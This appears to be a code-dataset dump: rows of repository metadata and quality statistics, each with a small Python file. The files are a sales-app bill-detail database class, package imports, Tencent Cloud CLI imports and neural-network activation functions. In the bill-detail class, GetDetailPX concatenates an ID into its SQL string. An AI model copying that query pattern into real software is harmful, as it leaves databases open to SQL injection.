| 23.571429 | 57 | 0.715152 | 25 | 165 | 4.68 | 0.56 | 0.333333 | 0.34188 | 0.410256 | 0.598291 | 0.598291 | 0.598291 | 0.598291 | 0 | 0 | 0 | 0.14966 | 0.109091 | 165 | 6 | 58 | 27.5 | 0.646259 | 0 | 0 | 0 | 0 | 0 | 0.339623 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a35cd2bc669818359054a4556d9b44f05eac5f29 | 2,409 | py | Python | models/BillDetail.py | mynamezxc/wxPython-saler-small-example | 91bf47f2f38d11f211ce3a00fa3b80f3cd5a4837 | [
"MIT"
] | 2 | 2020-02-08T07:12:09.000Z | 2020-11-07T13:30:16.000Z | models/BillDetail.py | mynamezxc/wxPython-sales-small-example | 91bf47f2f38d11f211ce3a00fa3b80f3cd5a4837 | [
"MIT"
] | null | null | null | models/BillDetail.py | mynamezxc/wxPython-sales-small-example | 91bf47f2f38d11f211ce3a00fa3b80f3cd5a4837 | [
"MIT"
] | null | null | null | from models.database import *
class BillModelct(Database):
def DanhSach(self):
chuoiSQL = "select ID, product_id,unit_id,product_nameHOA,unit_code,amount,unit_price,sub_total,tax,tax_amount,note,bill_id from bill_detail"
cursor = Database.getALL(self,chuoiSQL)
if cursor != None:
recordList = []
for row in cursor:
TT = {'ID':row[0], 'product_id':row[1],'unit_id':row[2],'product_nameHOA':row[3],'unit_code':row[4],'amount':row[5],'unit_price':row[6],'sub_total':row[7],'tax':row[8],'tax_amount':row[9],'note':row[10],'bill_id':row[11]}
recordList.append(TT)
return recordList
def GetDetailPX(self, ID_PX):
chuoiSQL = "select ID, product_id,unit_id,product_nameHOA,unit_code,amount,unit_price,sub_total,tax,tax_amount,note,bill_id from bill_detail where bill_id = "+ID_PX+""
cursor = Database.getALL(self,chuoiSQL)
if cursor != None:
recordList = []
for row in cursor:
TT = {'ID':row[0], 'product_id':row[1],'unit_id':row[2],'product_nameHOA':row[3],'unit_code':row[4],'amount':row[5],'unit_price':row[6],'sub_total':row[7],'tax':row[8],'tax_amount':row[9],'note':row[10],'bill_id':row[11]}
recordList.append(TT)
return recordList
def Insert(self,product_id,unit_id,product_nameHOA,unit_code,amount,unit_price,sub_total,tax,tax_amount,note,bill_id):
chuoiSQL = "insert into bill_detail (product_id,unit_id,product_nameHOA,unit_code,amount,unit_price,sub_total,tax,tax_amount,note,bill_id) values(?,?,?,?,?,?,?,?,?,?,?)"
kq = Database.execute(self,chuoiSQL,(product_id,unit_id,product_nameHOA,unit_code,amount,unit_price,sub_total,tax,tax_amount,note,bill_id))
return kq
def Update(self,Id, product_id,unit_id,product_nameHOA,unit_code,amount,unit_price,sub_total,tax,tax_amount,note,bill_id):
chuoiSQL = "update bill_detail set product_id = ?,unit_id = ?,product_nameHOA = ?,unit_code = ?,amount = ?,unit_price = ?,sub_total = ?,tax = ?,tax_amount = ?,note = ?,bill_id = ? where ID = ?"
kq = Database.execute(self,chuoiSQL,(product_id,unit_id,product_nameHOA,unit_code,amount,unit_price,sub_total,tax,tax_amount,note,bill_id,Id))
return kq
def Delete(self,Id):
chuoiSQL = "delete from bill_detail where ID = ? "
kq = Database.execute(self,chuoiSQL,(Id,))
return kq
| 58.756098 | 238 | 0.681196 | 364 | 2,409 | 4.266484 | 0.159341 | 0.063748 | 0.066967 | 0.07727 | 0.848036 | 0.848036 | 0.848036 | 0.820348 | 0.820348 | 0.820348 | 0 | 0.013979 | 0.168535 | 2,409 | 40 | 239 | 60.225 | 0.761358 | 0 | 0 | 0.53125 | 0 | 0.125 | 0.327522 | 0.178912 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15625 | false | 0 | 0.03125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a39e45c8d8347d2596f2983b4f2674b29848a07e | 29 | py | Python | model/__init__.py | ivanwhaf/faster-rcnn-pytorch | 332483019dff5f14014508bea4b79b6d0c9c2f43 | [
"MIT"
] | null | null | null | model/__init__.py | ivanwhaf/faster-rcnn-pytorch | 332483019dff5f14014508bea4b79b6d0c9c2f43 | [
"MIT"
] | null | null | null | model/__init__.py | ivanwhaf/faster-rcnn-pytorch | 332483019dff5f14014508bea4b79b6d0c9c2f43 | [
"MIT"
] | null | null | null | from .model import FasterRCNN | 29 | 29 | 0.862069 | 4 | 29 | 6.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103448 | 29 | 1 | 29 | 29 | 0.961538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6eb833871341bbe1725084d9b5a2deb675bf0165 | 209 | py | Python | tccli/services/live/__init__.py | hapsyou/tencentcloud-cli-intl-en | fa8ba71164484f9a2be4b983080a1de08606c0b0 | [
"Apache-2.0"
] | null | null | null | tccli/services/live/__init__.py | hapsyou/tencentcloud-cli-intl-en | fa8ba71164484f9a2be4b983080a1de08606c0b0 | [
"Apache-2.0"
] | null | null | null | tccli/services/live/__init__.py | hapsyou/tencentcloud-cli-intl-en | fa8ba71164484f9a2be4b983080a1de08606c0b0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from tccli.services.live.live_client import register_arg
from tccli.services.live.live_client import get_actions_info
from tccli.services.live.live_client import AVAILABLE_VERSION_LIST
| 41.8 | 66 | 0.832536 | 32 | 209 | 5.1875 | 0.53125 | 0.162651 | 0.307229 | 0.379518 | 0.668675 | 0.668675 | 0.668675 | 0 | 0 | 0 | 0 | 0.005208 | 0.08134 | 209 | 4 | 67 | 52.25 | 0.859375 | 0.100478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6eeb36f004f5ebc4b746a48e3b1b8c1053ee6c06 | 625 | py | Python | nn_framework/activation.py | brohrer/nn_framework | 73cc78a316ca2a1126d25c057ce50b77030b2554 | [
"MIT"
] | 17 | 2019-07-13T01:21:26.000Z | 2022-02-06T14:20:17.000Z | nn_framework/activation.py | brohrer/nn_framework | 73cc78a316ca2a1126d25c057ce50b77030b2554 | [
"MIT"
] | null | null | null | nn_framework/activation.py | brohrer/nn_framework | 73cc78a316ca2a1126d25c057ce50b77030b2554 | [
"MIT"
] | 10 | 2019-10-13T09:17:56.000Z | 2022-01-10T09:19:24.000Z | import numpy as np
# All of these need to be able to handle 2D numpy arrays as inputs.
class tanh(object):
@staticmethod
def calc(v):
return np.tanh(v)
@staticmethod
def calc_d(v):
return 1 - np.tanh(v) ** 2
class logistic(object):
@staticmethod
def calc(v):
return 1 / (1 + np.exp(-v))
@staticmethod
def calc_d(v):
return logistic.calc(v) * (1 - logistic.calc(v))
class relu(object):
@staticmethod
def calc(v):
return np.maximum(0, v)
@staticmethod
def calc_d(v):
# Elementwise derivative so 2D numpy arrays are handled
return (v > 0).astype(float)
| 16.891892 | 67 | 0.552 | 90 | 625 | 3.8 | 0.366667 | 0.263158 | 0.333333 | 0.292398 | 0.473684 | 0.473684 | 0.163743 | 0 | 0 | 0 | 0 | 0.024213 | 0.3392 | 625 | 36 | 68 | 17.361111 | 0.803874 | 0.104 | 0 | 0.48 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.32 | false | 0 | 0.04 | 0.2 | 0.64 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
42cb4325951ee647a9d45ee46c2eb6cc5092aac2 | 21 | py | Python | sandbox/sandbox.py | dgketchum/MT_Rsense | 072238fbca19f2887e29c1a48111d817e47243a3 | [
"Apache-2.0"
] | 5 | 2019-10-16T13:09:49.000Z | 2022-03-31T18:23:51.000Z | sandbox/sandbox.py | dgketchum/MT_Rsense | 072238fbca19f2887e29c1a48111d817e47243a3 | [
"Apache-2.0"
] | null | null | null | sandbox/sandbox.py | dgketchum/MT_Rsense | 072238fbca19f2887e29c1a48111d817e47243a3 | [
"Apache-2.0"
] | 1 | 2022-03-18T17:02:03.000Z | 2022-03-18T17:02:03.000Z | import ogr
import os
| 7 | 10 | 0.809524 | 4 | 21 | 4.25 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 21 | 2 | 11 | 10.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |